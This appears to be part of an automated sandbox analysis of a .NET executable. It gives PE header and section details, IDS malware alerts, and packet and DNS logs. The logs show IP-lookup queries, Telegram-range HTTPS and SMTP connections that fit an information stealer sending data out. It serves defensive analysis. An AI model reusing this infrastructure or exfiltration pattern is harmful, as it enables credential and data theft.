                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb0dec0x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb20000x1710.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xb40000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xaee640xaf000cbbca3fdd9b71b76897f555775188c65False0.934755859375data7.801975437341518IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xb20000x17100x18000288b87a92ea78163e4b0c0d0fe570cdFalse0.18440755208333334data2.7700824416825722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xb40000xc0x200c18c2ae3f741120e361bbeda0dfd9dceFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xb21600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.09451219512195122
                                                                                                RT_GROUP_ICON0xb32080x14data1.1
                                                                                                RT_GROUP_ICON0xb321c0x14data1.05
                                                                                                RT_VERSION0xb32300x2f4data0.43386243386243384
                                                                                                RT_MANIFEST0xb35240x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-12-06T09:57:57.177110+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702193.122.6.16880TCP
                                                                                                2024-12-06T09:57:59.458397+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702193.122.6.16880TCP
                                                                                                2024-12-06T09:58:01.078229+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707172.67.177.134443TCP
                                                                                                2024-12-06T09:58:02.520889+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749714193.122.6.16880TCP
                                                                                                2024-12-06T09:58:07.197372+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749727172.67.177.134443TCP
                                                                                                2024-12-06T09:58:13.318951+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749747172.67.177.134443TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 6, 2024 09:57:55.335424900 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:55.455307007 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:55.455404997 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:55.456281900 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:55.576045990 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:56.725158930 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:56.730031013 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:56.849797964 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:57.135261059 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:57.177109957 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:57.327474117 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:57.327517033 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:57.328007936 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:57.334569931 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:57.334584951 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.553976059 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.554068089 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:58.559618950 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:58.559633017 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.559977055 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.613951921 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:58.659331083 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.990583897 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.990664005 CET44349704172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:58.990782976 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:59.007124901 CET49704443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:59.010875940 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:57:59.130672932 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:59.416158915 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:57:59.419143915 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:59.419182062 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:59.419475079 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:59.419814110 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:57:59.419823885 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:57:59.458396912 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:00.633052111 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:00.636590958 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:00.636605024 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:01.078259945 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:01.078325987 CET44349707172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:01.078443050 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:01.078982115 CET49707443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:01.082134962 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:01.083250046 CET4971480192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:01.202225924 CET8049702193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:01.202958107 CET8049714193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:01.203008890 CET4970280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:01.203049898 CET4971480192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:01.203236103 CET4971480192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:01.322885990 CET8049714193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:02.471240044 CET8049714193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:02.472681046 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:02.472716093 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:02.472805977 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:02.473041058 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:02.473050117 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:02.520889044 CET4971480192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:03.684205055 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:03.687238932 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:03.687259912 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:04.138979912 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:04.139056921 CET44349715172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:04.139121056 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:04.139713049 CET49715443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:04.147187948 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:04.266942024 CET8049721193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:04.267076969 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:04.267254114 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:04.386970997 CET8049721193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:05.534806967 CET8049721193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:05.536098003 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:05.536151886 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:05.536223888 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:05.536453962 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:05.536464930 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:05.583389044 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:06.750205994 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:06.751986980 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:06.752011061 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:07.197407007 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:07.197470903 CET44349727172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:07.197515965 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:07.197932005 CET49727443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:07.201488972 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:07.202177048 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:07.321620941 CET8049721193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:07.321732998 CET4972180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:07.321847916 CET8049731193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:07.322092056 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:07.322391987 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:07.442029953 CET8049731193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:08.591383934 CET8049731193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:08.593087912 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:08.593144894 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:08.593211889 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:08.593471050 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:08.593486071 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:08.645901918 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:09.803551912 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:09.805557013 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:09.805584908 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:10.251939058 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:10.252012968 CET44349734172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:10.252155066 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:10.252677917 CET49734443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:10.256469011 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:10.257107019 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:10.376504898 CET8049731193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:10.376749039 CET8049740193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:10.376889944 CET4973180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:10.376925945 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:10.377443075 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:10.499880075 CET8049740193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:11.644012928 CET8049740193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:11.645343065 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:11.645402908 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:11.645477057 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:11.645771980 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:11.645791054 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:11.692857981 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:12.857929945 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:12.859782934 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:12.859823942 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:13.318504095 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:13.318562984 CET44349747172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:13.318906069 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:13.319170952 CET49747443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:13.323230982 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:13.324413061 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:13.443197966 CET8049740193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:13.443279028 CET4974080192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:13.444102049 CET8049751193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:13.444341898 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:13.444483042 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:13.564142942 CET8049751193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:14.711546898 CET8049751193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:14.712836981 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:14.712866068 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:14.712990046 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:14.713248968 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:14.713264942 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:14.755332947 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:15.925076008 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:15.935556889 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:15.935592890 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:16.370825052 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:16.370884895 CET44349756172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:16.370969057 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:16.371485949 CET49756443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:16.374731064 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:16.375891924 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:16.494987011 CET8049751193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:16.495207071 CET4975180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:16.495726109 CET8049762193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:16.495816946 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:16.495982885 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:16.615695953 CET8049762193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:17.823139906 CET8049762193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:17.824690104 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:17.824743986 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:17.824832916 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:17.825089931 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:17.825110912 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:17.864666939 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.126192093 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.133867025 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:19.133900881 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.586297989 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.586364985 CET44349765172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.586534977 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:19.586992025 CET49765443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:19.589700937 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.590847969 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.710191011 CET8049762193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.710251093 CET4976280192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.710576057 CET8049771193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:19.710645914 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.710773945 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:19.830553055 CET8049771193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:21.176299095 CET8049771193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:21.177854061 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:21.177906990 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:21.177984953 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:21.178261995 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:21.178276062 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:21.224102020 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:22.388474941 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:22.390300035 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:22.390353918 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:22.834542036 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:22.834619999 CET44349775172.67.177.134192.168.2.7
                                                                                                Dec 6, 2024 09:58:22.834665060 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:22.835100889 CET49775443192.168.2.7172.67.177.134
                                                                                                Dec 6, 2024 09:58:22.891644001 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:23.011948109 CET8049771193.122.6.168192.168.2.7
                                                                                                Dec 6, 2024 09:58:23.012034893 CET4977180192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:23.030747890 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:23.030786037 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:23.030843973 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:23.031366110 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:23.031373978 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.400238991 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.400528908 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:24.403332949 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:24.403340101 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.403585911 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.405025959 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:24.451324940 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.904748917 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.904829025 CET44349781149.154.167.220192.168.2.7
                                                                                                Dec 6, 2024 09:58:24.904949903 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:24.909862041 CET49781443192.168.2.7149.154.167.220
                                                                                                Dec 6, 2024 09:58:31.153436899 CET4971480192.168.2.7193.122.6.168
                                                                                                Dec 6, 2024 09:58:32.008882046 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:32.128711939 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:32.128863096 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:33.702389002 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:33.702600002 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:33.879033089 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:34.134870052 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:34.136219025 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:34.255966902 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:34.568434954 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:34.568869114 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:34.689331055 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:35.099234104 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:35.099524021 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:35.219305038 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:35.531543016 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:35.531796932 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:35.651621103 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.008179903 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.008358002 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:36.128114939 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.440217018 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.440874100 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:36.440920115 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:36.440936089 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:36.440958023 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 09:58:36.560646057 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.560667992 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.560725927 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:36.560764074 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:37.045192957 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 09:58:37.099111080 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 10:00:11.241167068 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 10:00:11.360877991 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 10:00:11.875353098 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 10:00:11.875493050 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 10:00:11.875560999 CET5874980277.245.159.14192.168.2.7
                                                                                                Dec 6, 2024 10:00:11.875636101 CET49802587192.168.2.777.245.159.14
                                                                                                Dec 6, 2024 10:00:11.995857000 CET5874980277.245.159.14192.168.2.7

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 6, 2024 09:57:55.183784962 CET5474353192.168.2.71.1.1.1
                                                                                                Dec 6, 2024 09:57:55.320837975 CET53547431.1.1.1192.168.2.7
                                                                                                Dec 6, 2024 09:57:57.185920954 CET6452453192.168.2.71.1.1.1
                                                                                                Dec 6, 2024 09:57:57.326587915 CET53645241.1.1.1192.168.2.7
                                                                                                Dec 6, 2024 09:58:22.892209053 CET6176853192.168.2.71.1.1.1
                                                                                                Dec 6, 2024 09:58:23.030009031 CET53617681.1.1.1192.168.2.7
                                                                                                Dec 6, 2024 09:58:31.213325024 CET5053953192.168.2.71.1.1.1
                                                                                                Dec 6, 2024 09:58:32.007359982 CET53505391.1.1.1192.168.2.7

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Dec 6, 2024 09:57:55.183784962 CET192.168.2.71.1.1.10x29f7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                Dec 6, 2024 09:57:57.185920954 CET192.168.2.71.1.1.10xfe09Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
